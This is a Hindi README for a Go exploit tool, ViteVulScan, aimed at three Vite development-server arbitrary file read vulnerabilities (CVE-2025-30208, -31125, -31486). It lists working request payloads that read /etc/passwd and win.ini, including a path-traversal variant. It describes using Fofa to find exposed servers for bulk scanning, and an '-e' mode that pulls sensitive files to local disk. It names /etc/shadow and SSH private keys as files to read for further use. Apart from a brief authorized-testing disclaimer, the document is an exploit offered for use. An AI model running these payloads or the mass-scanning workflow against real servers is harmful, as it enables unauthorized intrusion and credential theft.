
CVE-2025-30208 और CVE-2025-31125 के लिए एक्सप्लॉइट
इस परियोजना में 3 भेद्यताएँ शामिल हैं: CVE-2025-30208/CVE-2025-31125/CVE-2025-31486, ये सभी Vite डेवलपमेंट सर्वर में आर्बिट्रेरी फ़ाइल रीड भेद्यताएँ हैं, ये तीनों भेद्यताएँ व्यापक कवरेज वाली हैं और उपयोग में सरल और अप्रतिबंधित हैं।
CVE-2025-30208:
Windows: /@fs/C://Windows/win.ini?import&raw??
Linux: /@fs/etc/passwd?import&raw??
CVE-2025-31125
Windows: /@fs/C://windows/win.ini?import&?inline=1.wasm?init
Linux: /@fs/etc/passwd?import&?inline=1.wasm?init
CVE-2025-31486
Windows: /@fs/x/x/x/vite-project/?/../../../../../C://windows/win.ini?import&?inline=1.wasm?init
Linux: /@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?inline=1.wasm?init
पथ में /@fs की आवश्यकता नहीं है।
body="/@vite/client"
go संस्करण: go 1.20 और उससे ऊपर का संस्करण
प्रोजेक्ट रूट डायरेक्टरी में जाएँ
पहले निर्भरताएँ सिंक करें
go mod tidy
फिर प्रोजेक्ट को कंपाइल करें
go build -o ViteVulScan -ldflags="-s -w" -trimpath .
./ViteVulScan चलाकर स्क्रिप्ट को चलाया जा सकता है।
आप प्रोजेक्ट रूट डायरेक्टरी में सीधे भी प्रोजेक्ट चला सकते हैं:
go run .
स्क्रिप्ट Fofa के साथ एकीकृत होकर संपत्तियों की खोज करने और फिर बल्क जाँच करने का समर्थन करती है।
Fofa का उपयोग करने के लिए, सुनिश्चित करें कि app.ini फ़ाइल और कंपाइल की गई बाइनरी फ़ाइल एक ही डायरेक्टरी में हों, और config डायरेक्टरी में app.ini फ़ाइल को संशोधित करना होगा, जिसमें fofakey फ़ील्ड में अपनी fofakey भरें, और num में अनुमानित संपत्तियों की संख्या जिसे आप जाँचना चाहते हैं।
यदि आपके पास इस भेद्यता के लिए बेहतर Fofa मैपिंग सिंटैक्स है, तो आप fofaQuery फ़ील्ड को स्वयं संशोधित कर सकते हैं।
Usage of ./ViteVulScan:
http://example1.com
example2.com
127.0.0.1
उदाहरण 1: Fofa के साथ एकीकृत होकर बल्क जाँच:
./ViteVulScan -fofa

स्कैन समाप्त होने के बाद, result निर्देशिका में सफलतापूर्वक उपयोग किए गए URL का CSV फ़ाइल दिखाई देगा, जो टाइमस्टैम्प के नाम से होगा:

उदाहरण 2: भेद्यता वाले URL का गहन उपयोग:
./ViteVulScan -u example.com -e

यदि "उपयोग सफल" दिखाई देता है, तो result निर्देशिका देखें, वहाँ स्कैन किए गए URL के नाम पर एक निर्देशिका होगी, स्कैन की गई संवेदनशील फ़ाइलों की सामग्री मूल फ़ाइल प्रारूप में पार्स करके संबंधित पथ पर सहेजी जाएगी, प्रभाव नीचे दिखाया गया है:

सहेजी गई result/localhost:5173/etc/passwd की सामग्री के उदाहरण में, संवेदनशील जानकारी की पूरी सामग्री सहेजी गई दिखाई देती है, जो आगे के उपयोग के लिए सुविधाजनक है (यदि /etc/shadow या सर्वर की SSH प्राइवेट की पढ़ी जा सके, तो आगे उपयोग किया जा सकता है)।

यह उपकरण केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए है, कृपया अवैध उद्देश्यों के लिए उपयोग न करें। इस उपकरण का उपयोग करके किसी भी अनधिकृत परीक्षण के परिणामस्वरूप होने वाले परिणाम उपयोगकर्ता स्वयं वहन करेगा।
| पैरामीटर | विवरण |
|---|
| -cve | किस CVE भेद्यता का उपयोग करके जाँच करना है। CVE_2025_30208/CVE_2025_31125/CVE_2025_31486 समर्थित हैं। डिफ़ॉल्ट CVE_2025_30208 है। |
| -fofa | इस पैरामीटर को निर्दिष्ट करने पर, Fofa के साथ एकीकृत होकर संपत्तियों का मैप करेगा और प्राप्त लक्ष्य संपत्तियों पर बल्क जाँच करेगा |
| -u | -url | एकल URL लक्ष्य निर्दिष्ट करें और उसकी जाँच करें |
| -f | -filename | एक फ़ाइल नाम निर्दिष्ट करें, उसमें URL पतों की बल्क जाँच करें |
| -e | इस पैरामीटर को निर्दिष्ट करने पर, भेद्यता वाली संपत्तियों का गहन उपयोग किया जाएगा, विभिन्न संभावित संवेदनशील फ़ाइलों को पढ़कर स्थानीय रूप से सहेजा जाएगा। (कृपया इस सुविधा का सावधानीपूर्वक उपयोग करें, बेहतर है कि एकल लक्ष्य पर जाँच करें, यानी -u के साथ इस पैरामीटर का उपयोग करें।) |